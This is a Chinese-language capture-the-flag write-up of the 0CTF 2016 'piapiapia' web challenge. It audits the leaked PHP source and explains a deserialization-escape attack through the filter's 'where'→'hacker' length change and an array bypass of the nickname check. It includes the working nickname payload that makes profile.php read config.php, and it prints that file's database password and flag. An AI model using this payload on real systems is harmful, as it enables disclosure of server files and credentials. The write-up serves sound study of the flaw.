[0CTF 2016]piapiapia

这个题目首先是用dirsearch来扫，扫出来一个www.zip

然后下载下来

 

 

 根据这个备份的目录，首先打开register.php

<?php
    require_once('class.php');
    if($_POST['username'] && $_POST['password']) {
        $username = $_POST['username'];
        $password = $_POST['password'];

        if(strlen($username) < 3 or strlen($username) > 16) 
            die('Invalid user name');

        if(strlen($password) < 3 or strlen($password) > 16) 
            die('Invalid password');
        if(!$user->is_exists($username)) {
            $user->register($username, $password);
            echo 'Register OK!<a href="index.php">Please Login</a>';        
        }
        else {
            die('User name Already Exists');
        }
    }
    else {
?>
<?php
　　}
?>

按照流程，进入注册那边注册一个测试账号

登陆测试账号

 

 发现是一个完善个人信息页面

 

 

 

 

 

 

 

 

 这是update.php的源码

<?php
    require_once('class.php');
    if($_SESSION['username'] == null) {
        die('Login First');    
    }
    if($_POST['phone'] && $_POST['email'] && $_POST['nickname'] && $_FILES['photo']) {

        $username = $_SESSION['username'];
        if(!preg_match('/^\d{11}$/', $_POST['phone']))
            die('Invalid phone');

        if(!preg_match('/^[_a-zA-Z0-9]{1,10}@[_a-zA-Z0-9]{1,10}\.[_a-zA-Z0-9]{1,10}$/', $_POST['email']))
            die('Invalid email');
        
        if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
            die('Invalid nickname');

        $file = $_FILES['photo'];
        if($file['size'] < 5 or $file['size'] > 1000000)
            die('Photo size error');

        move_uploaded_file($file['tmp_name'], 'upload/' . md5($file['name']));
        $profile['phone'] = $_POST['phone'];
        $profile['email'] = $_POST['email'];
        $profile['nickname'] = $_POST['nickname'];
        $profile['photo'] = 'upload/' . md5($file['name']);

        $user->update_profile($username, serialize($profile));
        echo 'Update Profile Success!<a href="profile.php">Your Profile</a>';
    }
    else {
?>
<?php
    }
?>

 

 审计代码，发现可以很简单的去绕过nicename那个preg_match()方法，用数组报错就可以绕过这种判断，可以上传任意参数。然后还有一个地方是可控的是上传照片那个地方，所以这两个是最可能存在漏洞的地方。

同时这里出现了序列化，考虑可能是反序列化题目。

随便输个数字是这样的。

 

 

 

 

然后通过这个审计每个源文件的代码，

从class.php开始

<?php
require('config.php');

class user extends mysql{
    private $table = 'users';

    public function is_exists($username) {
        $username = parent::filter($username);

        $where = "username = '$username'";
        return parent::select($this->table, $where);
    }
    public function register($username, $password) {
        $username = parent::filter($username);
        $password = parent::filter($password);

        $key_list = Array('username', 'password');
        $value_list = Array($username, md5($password));
        return parent::insert($this->table, $key_list, $value_list);
    }
    public function login($username, $password) {
        $username = parent::filter($username);
        $password = parent::filter($password);

        $where = "username = '$username'";
        $object = parent::select($this->table, $where);
        if ($object && $object->password === md5($password)) {
            return true;
        } else {
            return false;
        }
    }
    public function show_profile($username) {
        $username = parent::filter($username);

        $where = "username = '$username'";
        $object = parent::select($this->table, $where);
        return $object->profile;
    }
    public function update_profile($username, $new_profile) {
        $username = parent::filter($username);
        $new_profile = parent::filter($new_profile);

        $where = "username = '$username'";
        return parent::update($this->table, 'profile', $new_profile, $where);
    }
    public function __tostring() {
        return __class__;
    }
}

class mysql {
    private $link = null;

    public function connect($config) {
        $this->link = mysql_connect(
            $config['hostname'],
            $config['username'], 
            $config['password']
        );
        mysql_select_db($config['database']);
        mysql_query("SET sql_mode='strict_all_tables'");

        return $this->link;
    }

    public function select($table, $where, $ret = '*') {
        $sql = "SELECT $ret FROM $table WHERE $where";
        $result = mysql_query($sql, $this->link);
        return mysql_fetch_object($result);
    }

    public function insert($table, $key_list, $value_list) {
        $key = implode(',', $key_list);
        $value = '\'' . implode('\',\'', $value_list) . '\''; 
        $sql = "INSERT INTO $table ($key) VALUES ($value)";
        return mysql_query($sql);
    }

    public function update($table, $key, $value, $where) {
        $sql = "UPDATE $table SET $key = '$value' WHERE $where";
        return mysql_query($sql);
    }

    public function filter($string) {
        $escape = array('\'', '\\\\');
        $escape = '/' . implode('|', $escape) . '/';
        $string = preg_replace($escape, '_', $string);

        $safe = array('select', 'insert', 'update', 'delete', 'where');
        $safe = '/' . implode('|', $safe) . '/i';
        return preg_replace($safe, 'hacker', $string);
    }
    public function __tostring() {
        return __class__;
    }
}
session_start();
$user = new user();
$user->connect($config);

 

这里面基本上是存的是用户的类之类的。然后有个关键点：fliter方法，有过滤导致字符数变化。

然后是

profile.php

<?php
    require_once('class.php');
    if($_SESSION['username'] == null) {
        die('Login First');    
    }
    $username = $_SESSION['username'];
    $profile=$user->show_profile($username);
    if($profile  == null) {
        header('Location: update.php');
    }
    else {
        $profile = unserialize($profile);
        $phone = $profile['phone'];
        $email = $profile['email'];
        $nickname = $profile['nickname'];
        $photo = base64_encode(file_get_contents($profile['photo']));
?>

 

这个里面有调用文件的过程，还有反序列化，考虑利用$photo来获得访问的文件，但是在前面update.php文件名字用了MD5来加密，md5是不可逆的，所以很难去通过这边入手，于是考虑反序列化逃逸。

加上nicename是可以自己控制，加上filter过滤改变字符数目，基本上很明显可以用反序列化逃逸。

在update那里抓包修改

 

 

 然后进入到profile.php里面可以得到

<?php
$config['hostname'] = '127.0.0.1';
$config['username'] = 'root';
$config['password'] = 'qwertyuiop';
$config['database'] = 'challenges';
$flag = 'flag{80015de4-2a66-480f-9d41-2edc337ea446}';
?>

 

为了方便理解反序列化逃逸

<?php
function filter($string) {
    $escape = array('\'', '\\\\');
    $escape = '/' . implode('|', $escape) . '/';
    $string = preg_replace($escape, '_', $string);


    $safe = array('select', 'insert', 'update', 'delete', 'where');
    $safe = '/' . implode('|', $safe) . '/i';
    return preg_replace($safe, 'hacker', $string);
}
$profile['phone'] = $_POST['phone'];
$profile['email'] = $_POST['email'];
$profile['nickname'] = $_POST['nickname'];
// $profile['realname'] = $_POST['realname'];
$profile['photo'] = 'upload/' . '1.png';



$profile = serialize($profile);
echo $profile.'<br>';
$profile = filter($profile);
echo $profile.'<br>';
$profile = unserialize($profile);
$phone = $profile['phone'];
$email = $profile['email'];
$nickname = $profile['nickname'];
$photo = base64_encode(file_get_contents($profile['photo']));
var_dump($profile);



echo '<br>';



?>
<details>nicename[]=wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}</details>

 

用上面这个在php里面跑一下可以理解。

 

 

 

<?php

    require_once('class.php');

    if($_SESSION['username'] == null) {

        die('Login First');

    }

    if($_POST['phone'] && $_POST['email'] && $_POST['nickname'] && $_FILES['photo']) {

        $username = $_SESSION['username'];

        if(!preg_match('/^\d{11}$/', $_POST['phone']))

            die('Invalid phone');

        if(!preg_match('/^[_a-zA-Z0-9]{1,10}@[_a-zA-Z0-9]{1,10}\.[_a-zA-Z0-9]{1,10}$/', $_POST['email']))

            die('Invalid email');

       

        if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)

            die('Invalid nickname');

        $file = $_FILES['photo'];

        if($file['size'] < 5 or $file['size'] > 1000000)

            die('Photo size error');

        move_uploaded_file($file['tmp_name'], 'upload/' . md5($file['name']));

        $profile['phone'] = $_POST['phone'];

        $profile['email'] = $_POST['email'];

        $profile['nickname'] = $_POST['nickname'];

        $profile['photo'] = 'upload/' . md5($file['name']);

        $user->update_profile($username, serialize($profile));

        echo 'Update Profile Success!<a href="profile.php">Your Profile</a>';

    }

    else {

?>

<!DOCTYPE html>

<html>

<head>

   <title>UPDATE</title>

   <link href="static/bootstrap.min.css" rel="stylesheet">

   <script src="static/jquery.min.js"></script>

   <script src="static/bootstrap.min.js"></script>

</head>

<body>

    <div class="container" style="margin-top:100px">  

        <form action="update.php" method="post" enctype="multipart/form-data" class="well" style="width:220px;margin:0px auto;">

            <img src="static/piapiapia.gif" class="img-memeda " style="width:180px;margin:0px auto;">

            <h3>Please Update Your Profile</h3>

            <label>Phone:</label>

            <input type="text" name="phone" style="height:30px"class="span3"/>

            <label>Email:</label>

            <input type="text" name="email" style="height:30px"class="span3"/>

            <label>Nickname:</label>

            <input type="text" name="nickname" style="height:30px" class="span3">

            <label for="file">Photo:</label>

            <input type="file" name="photo" style="height:30px"class="span3"/>

            <button type="submit" class="btn btn-primary">UPDATE</button>

        </form>

    </div>

</body>

</html>

<?php

    }

?>